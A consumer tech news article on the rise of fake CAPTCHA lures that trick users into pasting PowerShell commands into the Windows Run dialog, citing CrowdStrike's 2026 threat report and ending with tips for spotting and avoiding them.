Follow : Add us as a preferred source on Google.

Key takeaways

• Malicious CAPTCHAs are becoming increasingly popular as a lure.  
• They increased 563% in use over 2025.
• Spotting a fake CAPTCHA can be challenging, but here's how. 

CAPTCHAs can be annoying, but they provide a level of user verification that can help web services defend against a range of cyber threats. 

Unfortunately, they can also be employed as malicious lures that target visitors, and appear to be becoming a weapon of choice for modern cybercriminals. 

Also: Ordering a new phone? Watch out for this convincing scam that hits immediately after

According to CrowdStrike's 2026 Global Threat Report, published on Tuesday, fake CAPTCHA lures are being adopted at breakneck speed by attackers hoping to compromise your devices. Over the past two years, their popularity has increased to the point that malicious browser update lures are being retired in favor of them. 

What is a CAPTCHA?

A CAPTCHA, otherwise known as the wordy "Completely Automated Public Turing Test to tell Computers and Humans Apart," is a challenge-and-response mechanism found on websites. 

CAPTCHAs set a challenge that distinguishes between human and robotic visitors to a website, resource, or online service. These challenges may take the form of visual puzzles. Or you may have to type a word or set of letters and numbers that have been distorted to make it difficult for robots to identify properly. You also may be asked to hold a button down for a set amount of time to prove you are human. 

Also: Half of all cyberattacks start in your browser: 10 essential tips for staying safe

These mechanisms were first designed to stop bots and robotic agents from spamming website forums and platforms with automated messaging and replies, but have expanded to stop brute-force password login attempts, automated mass purchases or signups, scraping, and to stop bot-based online attacks. 

They're frustrating, true, especially when the system can't verify that you are human through the first exercise -- which may mean you have to complete one or two more puzzles. This is especially a problem if you have accessibility needs. However, they are now part of life online and do provide a layer of protection for websites facing automated threats. 

CrowdStrike's findings

According to CrowdStrike's report, last year, many cybercriminals moved away from browser-update-related phishing lures toward fake CAPTCHA tactics. 

Compared with 2024 security event data, the research team reported a 563% increase in CAPTCHA lures in 2025, compared with browser update lures. 

Why are CAPTCHAs used as cybercriminal tools?

There's a wide variety of CAPTCHA windows and mechanisms, and threat actors exploit this lack of uniformity.

Also: I'm a tech pro and an AI job scam almost fooled me - here's what gave it away

At their core, malicious CAPTCHAs are used to lure a victim into performing an action resulting in the download and execution of malware or a visit to a malicious website. They may include system-level instructions, links to divert user traffic, or even QR codes that will send you to a phishing domain.

Cybercriminal campaigns involving malicious CAPTCHAs are most commonly associated with the deployment of Trojans, information stealers, and spyware. 

How to spot fake CATPCHAs and what to do next

Most often, fake CAPTCHA windows are used to try to lure a victim into hacking themselves. 

It's a social engineering method that focuses on those who are less tech-savvy. If you've ever heard of Clickfix, it's the same principle: display an alert that demands you take action, abuse our ability to problem-solve, provide a set of instructions, and entice someone to download a malicious package themselves -- preferably while staying under the radar. 

This is how they work. A fake CAPTCHA appears on a compromised or suspicious website. Instead of a puzzle or word game, you will be asked to verify that you are not a robot in another way -- and this involves following a set of instructions. 

Also: AI can now solve reCAPTCHA tests as accurately as you can

To make verification easier, these instructions are broken down into simple prompts and only require you to copy and paste a message into the Windows Run dialog (Win + R) or a terminal. Unfortunately, this will execute PowerShell and download a malicious payload onto your system.

Since you initiated the download yourself at the system level, standard anti-phishing protections won't help you. 

You may also come across "errors" in a CAPTCHA window that asks you to visit a different web page -- with a spoofed or phishing domain link provided -- instead, in order to access the content you were trying to reach. 

author Ed Bott followed the trail of a fake CAPTCHA (note: do not try this at home), and in his example, the fake CAPTCHA displayed the familiar Cloudflare logo and claimed that unusual traffic had been detected. The CAPTCHA notice displayed a set of Windows instructions that asked the user to copy and paste a command-line instruction for "manual verification" purposes. 

Also: I clicked on four sneaky online scams on purpose - to show you how they work

Unsuspecting users would run the instruction and unwittingly download a payload onto their PC, The Trojan:PowerShell/FakeCaptcha, which would then steal information from the machine.  

To prevent yourself from falling for a fake CAPTCHA, here's some advice:

• Do not run any system-level command requested online. It's most likely an attempt to scam you. This includes any copy-and-paste instructions. Anything beyond an annoying puzzle or letter exercise is not worth the risk to your security and privacy. 
• If a CAPTCHA message asks you to run anything, simply don't. 
• Keep your browser up to date and enable real-time web scanning. While this may not prevent you from encountering fake CAPTCHAs, you may be alerted if your browser detects a malicious window or a phishing website.
• Don't panic. Cybercriminals will try to frighten users into performing an action quickly rather than taking a step back and considering whether or not an alert is real. If you come across an error display or an urgent action message, take a few seconds to think about how genuine it is (it probably isn't). After that, close the tab.
• Consider using an ad blocker. They won't always capture phishing pop-ups or fake CAPTCHAs, but they may help -- and at the least, they will clean up your browsing experience. 
• Strange URL links, spelling mistakes, and odd word choices may all indicate you are facing a CAPTCHA lure. Be wary. 
• Read our guide and top tips for browser security and hygiene to keep your system safe.

Featured

Is Perplexity's new Computer a safer version of OpenClaw? How it works

Samsung Galaxy S26 vs. S24: After comparing both models, here's my take

7 AI coding techniques that quietly make you elite

21 hidden Netflix codes, tricks, and settings every power user needs to know

• Is Perplexity's new Computer a safer version of OpenClaw? How it works
• Samsung Galaxy S26 vs. S24: After comparing both models, here's my take
• 7 AI coding techniques that quietly make you elite
• 21 hidden Netflix codes, tricks, and settings every power user needs to know